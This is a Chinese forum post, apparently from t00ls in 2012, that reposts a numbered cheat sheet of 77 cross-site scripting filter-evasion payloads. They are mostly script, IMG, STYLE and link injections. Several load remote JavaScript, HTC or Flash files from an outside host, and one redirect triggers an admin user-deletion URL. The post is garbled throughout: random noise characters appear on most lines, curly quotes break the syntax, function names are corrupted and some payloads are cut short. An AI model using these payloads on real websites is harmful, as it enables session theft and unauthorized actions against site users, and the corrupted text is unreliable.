貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。, ]% b0 p! { G0 n' H' a6 g
/ B' G, o3 l3 P6 y. a5 Q0 F# R+ O
(1)普通的XSS JavaScript注入
5 u! E0 U; S" [1 B% @$ W- _ <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>0 t* N# q% U; Z$ K" Y P
+ ?( D* }& Z, F
(2)IMG标签XSS使用JavaScript命令* B! f9 f( ]8 r& W# E
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
3 D; j( a# u) e s
4 J( _9 B; U% ~* D5 ~ (3)IMG标签无分号无引号! Z& N# n& U$ p; s+ X) m. l
<IMG SRC=javascript:alert(‘XSS’)>
1 P+ x ^- T/ s9 B/ _' l+ Y3 E8 j# z) z5 E! j
(4)IMG标签大小写不敏感
, C' q( T' i7 t! v <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
0 D9 R7 [+ d; `, J: s0 t
+ w$ R( U9 e4 z$ @4 t (5)HTML编码(必须有分号)2 g! t' S. p" r6 j- l
<IMG SRC=javascript:alert(“XSS”)>
; W a0 v- E ~" L( D% H2 B0 y* A- z) c U
(6)修正缺陷IMG标签7 n/ x0 W0 z4 J9 j
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
; _; R; `7 _, y8 `! f0 }. @$ M! S* O5 p, n
(7)formCharCode标签(计算器)( p/ B1 N5 U& {) V
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>) r6 C4 D$ o8 s* P
3 s/ M& ~' C9 ]1 J4 _4 ~6 T3 j (8)UTF-8的Unicode编码(计算器)
, Q* [; l; W; {+ I" [ <IMG SRC=jav..省略..S')>
! [, n$ L2 O) N4 \4 O, |% E2 t. U# u& M) [ q' S1 I0 Y
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
5 Q0 G( g' C! J <IMG SRC=jav..省略..S')>
' L. G% a. K* t U' @( b
! c- t% j) ~1 A (10)十六进制编码也是没有分号(计算器)
, Q. L" o! R- a* z2 C <IMG SRC=java..省略..XSS')>
) M# V4 l! F: {% L9 i# @! A R+ {, d* j4 V; `3 e# k6 z2 p. j9 @ X; x
(11)嵌入式标签,将Javascript分开5 f/ l) S1 P& ^. c4 x
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; i0 |$ m0 @1 f. Q
% ]8 f( S+ q+ \9 w) {! {: f0 ` (12)嵌入式编码标签,将Javascript分开
+ i" V" R( `- P" H# Q <IMG SRC=”jav ascript:alert(‘XSS’);”>
8 P: B" O6 t% G7 h1 J8 E
B/ a# [* {% L9 J" ~; m (13)嵌入式换行符
! X) F) I# O6 j7 P4 H <IMG SRC=”jav ascript:alert(‘XSS’);”>
4 a5 F' ^6 g u3 E* c, u
' P, d3 _* \6 L' I; g+ J (14)嵌入式回车
+ C$ w0 Q5 ]( p" ^ <IMG SRC=”jav ascript:alert(‘XSS’);”>
; I. O8 c. H2 U; b% O1 N# M+ U% G K- j% @5 l# V x
(15)嵌入式多行注入JavaScript,这是XSS极端的例子# n# U1 ^) g4 O- z1 h* F7 x
<IMG SRC=”javascript:alert(‘XSS‘)”>
9 W* K q& g# [5 c/ S7 ?4 B: H1 ^4 J4 @) g
(16)解决限制字符(要求同页面)
. B: t8 w8 ?' V <script>z=’document.’</script>
2 Q% _2 M5 ]. R+ i0 g# j2 u" r <script>z=z+’write(“‘</script>
/ }- m/ |8 O; t* | <script>z=z+’<script’</script>
9 z% W) j; ]7 E9 I8 @) O <script>z=z+’ src=ht’</script>; X6 G4 e" y& Y& F5 n' u# E
<script>z=z+’tp://ww’</script>1 T9 i5 i8 R5 |9 \& c" Y' G
<script>z=z+’w.shell’</script>
6 ?/ X s7 w' m0 l4 g9 | <script>z=z+’.net/1.’</script> g ?8 _& D8 F' C$ A
<script>z=z+’js></sc’</script>
) ]$ g- k9 F/ K <script>z=z+’ript>”)’</script># E6 w' ?$ X* T3 E
<script>eval_r(z)</script>
$ v+ H# L' n% {- h' \' |9 {/ I" M. e+ U& @1 f5 N4 U
(17)空字符8 @9 C, e% w1 g+ i' ?6 {
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
( \- ~' r2 }( X1 m+ S" |& Y4 a, n0 c/ Z6 T0 L" m- J9 `: E
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用# I# m0 G# }0 ^4 q1 N
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
l" X# B) d7 m) [" y
7 B8 f" y" G u" h9 j' i$ Y (19)Spaces和meta前的IMG标签- u( o! {2 M/ f1 N9 s3 ^. ~
<IMG SRC=” � javascript:alert(‘XSS’);”>
& j) r% _# h. k* @. ^% c4 {1 w, S1 k% U7 Q. h8 z$ l
(20)Non-alpha-non-digit XSS8 Z# g9 f; S( B: t8 G/ e1 R
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
( Y1 ]7 b6 K) }3 @) ~7 P* z: Z1 q& f5 j+ A2 ?' Z& \$ s
(21)Non-alpha-non-digit XSS to 2: V2 T5 }, Y# o
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>0 M1 Q, C, X& a/ c) o
! q2 [0 {* a& b8 z- c' B
(22)Non-alpha-non-digit XSS to 3
0 L2 h1 ^. t; b( q. ? <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
2 m. h! V6 ?2 q9 L
# C6 F6 w6 U% W) j- d4 q' x0 q (23)双开括号
8 _2 K6 V0 N' I$ L% L <<SCRIPT>alert(“XSS”);//<</SCRIPT>/ t$ G' t+ v5 O7 I0 S" r
3 m! L' Q$ `5 J1 f
(24)无结束脚本标记(仅火狐等浏览器)4 \4 P# z- ~0 j& c o6 Q" x
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>6 O8 T5 p$ t* p; m( a) O
$ l+ W- [9 w$ N8 c
(25)无结束脚本标记2, c L" Q( H+ B( J3 p! i
<SCRIPT SRC=//3w.org/XSS/xss.js>* U2 S" V5 |5 v+ _
, V0 R1 C7 x6 b, ?! j
(26)半开的HTML/JavaScript XSS" a0 h. H7 j" [1 y3 ^" i; s
<IMG SRC=”javascript:alert(‘XSS’)”
' _6 `' l& a( A0 E5 _ }/ m) ~8 a
w: T3 a) G/ t5 j% x) @/ V% t7 O (27)双开角括号
9 U2 L% @3 i; t <iframe src=http://3w.org/XSS.html <1 v: G C6 j% s! x+ p; \) e
; e% B, T! n6 Y# b
(28)无单引号 双引号 分号& h. B( w+ A: b& e5 V4 r/ v1 h
<SCRIPT>a=/XSS/5 ]; W; F/ Y" C( I' U5 w* M4 O
alert(a.source)</SCRIPT>
8 C- \ g0 v8 O8 `
4 y' A @& S3 J' X/ N2 d, o (29)换码过滤的JavaScript
$ }) B8 Q) W0 f0 |, x' q- ~! M- d. F \”;alert(‘XSS’);//
\2 ?! q: `/ o+ y2 {& a3 x4 W# B ?7 r# n- u
(30)结束Title标签3 n+ q2 i/ x3 A: x6 l
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>8 J) { G2 C) R0 p( @3 W' _
' |; b- B/ ]; V2 b8 v (31)Input Image
* E2 T4 [% @- h; |6 W <INPUT SRC=”javascript:alert(‘XSS’);”>
5 t0 u; ]5 u3 N9 N% g
$ ^1 l& W+ Q) }2 X" u( }2 } (32)BODY Image
7 E3 w- q3 C3 k5 e) A7 a4 d! b+ ` <BODY BACKGROUND=”javascript:alert(‘XSS’)”>" L1 c7 K( l4 |) E$ o: q: h
1 c0 u4 s0 _( {. G& @; O, p2 q9 Q4 k
(33)BODY标签& R ~" I2 S) O$ ]8 S- L- u
<BODY(‘XSS’)>
" y1 R' A# R5 q$ |! b9 x5 l# O( X+ F. w: I- ]
(34)IMG Dynsrc
: B* U7 i' ?1 r$ a+ Z9 Y1 F" N: t <IMG DYNSRC=”javascript:alert(‘XSS’)”>& Y) a* E/ R+ o
: `) r6 c. _3 R* s6 ^' u! X
(35)IMG Lowsrc9 k' Y- B' B. |9 K
<IMG LOWSRC=”javascript:alert(‘XSS’)”>/ C% V8 y8 M8 j
. ]+ i$ D6 E$ z8 o2 Z (36)BGSOUND
' s) l4 j6 ]: u <BGSOUND SRC=”javascript:alert(‘XSS’);”>
2 q- c( ]7 Q$ e3 P- I A1 b2 d' j# {, ]- a. u# C- R8 d+ M
(37)STYLE sheet
6 n/ D$ o% p; o5 J6 ] <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>$ ?0 o6 s* x% J; y, C
# s% r+ G! R1 Y) Y! ] (38)远程样式表
$ D8 I2 B" C# C7 d3 \7 c% V <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
2 N- {4 K6 G$ W' Q" T, `# V U! p& ?4 f& y
(39)List-style-image(列表式)
# ?" x# I P% B% }! B9 k <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
* D% F, K; [5 T! c6 a# X9 Q, k* _1 W8 B: R8 l. q- [
(40)IMG VBscript
; x5 \! y8 I3 R4 c5 l <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
+ k9 G9 k2 \! H# @ f) H L9 `' O& N; `7 d$ U! q4 |. p
(41)META链接url
& o0 G. j2 n2 Y& r% }$ E" R3 o <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>6 f8 ~1 B8 {+ K4 J# h
! l9 s% X; p3 a
(42)Iframe0 G4 f, c0 ~+ o
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>6 @* u5 d% d* Y+ j; q# H
) i9 d8 \5 D" L" E/ B2 K' D4 a
(43)Frame
2 m) W1 z" \. ^ <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
2 M% ]0 }7 ^+ i
, ~3 ^4 p9 R& X7 D3 X (44)Table3 M/ l# E9 B0 C' N$ O. \
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
$ f5 [/ Y. {2 R$ J1 n
, g) U* ?% V: F (45)TD
" W* |+ o( O! o8 |" w <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
9 c- t" _/ n+ \' h
9 N4 {0 z1 F3 p R, K (46)DIV background-image
; B, o* R: D; D <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
?6 I3 r; `( B2 Q6 d' ^! V a
+ ^# ?" m) u; L- \0 g7 o (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
& U% z# m8 l7 M& J% k+ J <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
: P" `9 f3 p. o, R8 \
/ P* L/ i! ^7 @; G5 p- r4 J, T (48)DIV expression' {' ~: |2 T% t/ u1 ]5 k/ |
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
/ y; H) k! r6 F0 e A+ D* W* P4 ] n8 }) i2 h
(49)STYLE属性分拆表达
/ Q) s3 K( s/ k <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>% J7 C+ U$ t, U. O9 a6 H
/ K) b; f1 y4 C0 ~ g! u (50)匿名STYLE(组成:开角号和一个字母开头)
8 J: y8 C& L( S' w9 O <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>' J- S. [7 e* \/ g8 @
% c/ V! Q( t! J
(51)STYLE background-image
; v& q+ q* V5 _" s' e$ G% ?% l <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>: y" @8 E. K! _# }* R+ J
1 G( }2 @* Z/ h (52)IMG STYLE方式
7 d: r- V! ?3 V/ M3 [ exppression(alert(“XSS”))’>5 _1 c- \0 m4 L' _5 L
- w% k! ?7 ~/ O# @; F; ]2 @6 E
(53)STYLE background3 D( @+ v$ u( e1 I
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>% d0 K0 E7 N; y# U
* \2 B2 j' G/ o4 Y
(54)BASE
`* e) C" a' x2 Z# b1 _ <BASE HREF=”javascript:alert(‘XSS’);//”>6 f, {3 P( e$ \
; W, {: c m, w" s1 @ (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
# X/ Q4 M' I0 q* v <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>' t W9 T( I1 j- s8 r
{/ y' i+ N3 E+ I9 w7 k. ]; f" C ~6 D
(56)在flash中使用ActionScrpt可以混进你XSS的代码. N% O. D, y. s6 k" U" `, h
a=”get”;
- _) r8 {% X ~% ]3 k/ w: X# B# D b=”URL(\”";6 n1 P) _$ x7 n/ V" k' }$ b
c=”javascript:”;
' i- M) T+ b3 P7 b% P8 k5 t d=”alert(‘XSS’);\”)”;
( [) m1 @3 V1 H" C1 X% V eval_r(a+b+c+d);! [6 i* \2 o# }. Y! c
3 e# C* d0 ~4 F; z2 |& C. \
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
! D2 p- }" U- [) R- G+ q" V <HTML xmlns:xss>
+ p; D/ ~$ t. l* ~ <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
8 O! T- q, Y; i <xss:xss>XSS</xss:xss>
2 N2 o6 D3 O$ k. w9 s9 ` </HTML>0 g) @" q, V& P; D" P# C
1 E3 ] b4 w& D7 i8 ~2 R
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用! r$ f* Q$ L. X( A) c2 y$ k; I3 j
<SCRIPT SRC=””></SCRIPT>; A* S: S# `* j2 x7 N
% [3 H) A$ c a- B4 ^9 c2 a
(59)IMG嵌入式命令,可执行任意命令
* R& `9 l5 M" ~, z7 ` <IMG SRC=”http://www.XXX.com/a.php?a=b”>
; d1 e7 N9 X% o4 b
9 q) z1 O# P @ G+ x6 B2 w' }& m (60)IMG嵌入式命令(a.jpg在同服务器)9 |2 {) D( v; s$ G
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser! `! {; O; ?3 H/ L
" G8 i8 x) a1 s; k
(61)绕符号过滤
7 H* i* Q( v9 R) d3 ^ <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>. X' m! c, w/ }$ B! j
c) Q- e7 Z6 D3 n (62)! t& G' n# b9 e$ f3 C
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>. Z- Q8 [" q- y, l
: ^1 Y+ i! K; \( o* ?2 z2 @2 ` (63)
! D, U, ]& ^9 ~0 j2 O <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>" R2 m+ l# \8 v0 a9 n4 o3 H
! H1 Z0 X k4 [$ i. E. |5 d (64); |6 {" D0 \2 T. ]
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
, Q2 ?* P( `+ G: \6 q5 e6 V$ ?4 K. i% c W, x
(65)8 S9 d( x- F6 B, L3 p& Q5 D
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>- n' X5 {8 e- Q/ B: w @3 E
) \ J$ K) f2 _0 I0 i- W$ @1 ]0 p
(66)
5 x3 k3 F3 Y! g3 V- n <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
: N' S% i# b0 G$ \! y n- p' m6 A. O' H
(67): j. N7 i# g: H( R
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
+ E) d0 c0 J7 q% [
" C, q+ e- ~3 M7 ~& h$ b6 P (68)URL绕行
3 U# Q7 c) F6 Q" i <A HREF=”http://127.0.0.1/”>XSS</A>& N: C1 ~, A3 y
: O( f4 @% k& H3 J. _
(69)URL编码
6 |+ [( S1 z! I+ X <A HREF=”http://3w.org”>XSS</A>* z! O% u$ T; ]+ ~# c9 P
$ Y2 O& W6 e: Q( s" m5 c (70)IP十进制, w+ d' U0 X& s: c
<A HREF=”http://3232235521″>XSS</A>9 q/ \* u' n. O3 S* k
* H2 S& E* F; K4 h7 j7 k1 x (71)IP十六进制; W. Z( q' l- l5 O; N. H$ Q
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
0 P4 M+ g. T# S; P' e
+ g: u" ^+ E5 } (72)IP八进制- z) I% }4 |1 Z S
<A HREF=”http://0300.0250.0000.0001″>XSS</A>. i1 ^' Y% o2 Q3 C/ x% a
6 ]+ D# e3 E9 d# f9 G4 o
(73)混合编码; O: [0 p. K: J4 i! E+ B- V. H
<A HREF=”h/ Y, j" \: Z) r6 Y- M* M, o, o2 W1 n
tt p://6 6.000146.0×7.147/”">XSS</A>& n7 M/ y! P) S1 P; X# d G" L
4 ]# m. a& F& W, k# |% R
(74)节省[http:]
- t1 B* b! m" V7 s [5 N9 x <A HREF=”//www.google.com/”>XSS</A>
' A/ C" s% S$ J' N1 L! I7 M* D8 p/ ^& s6 Z( X
(75)节省[www]
" m; V" @ ]% Q3 m4 V( f <A HREF=”http://google.com/”>XSS</A>% v% W& b# A w" U& P8 }6 ?0 T9 }
5 P" b, B9 H9 h' x (76)绝对点绝对DNS, }& Y2 e! [' z, U
<A HREF=”http://www.google.com./”>XSS</A>: f' l: Q' V2 \+ U: o7 @7 Z J
/ I$ |) M! K* ]2 X (77)javascript链接; Z3 K( e" p" A5 J; l+ V+ S
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对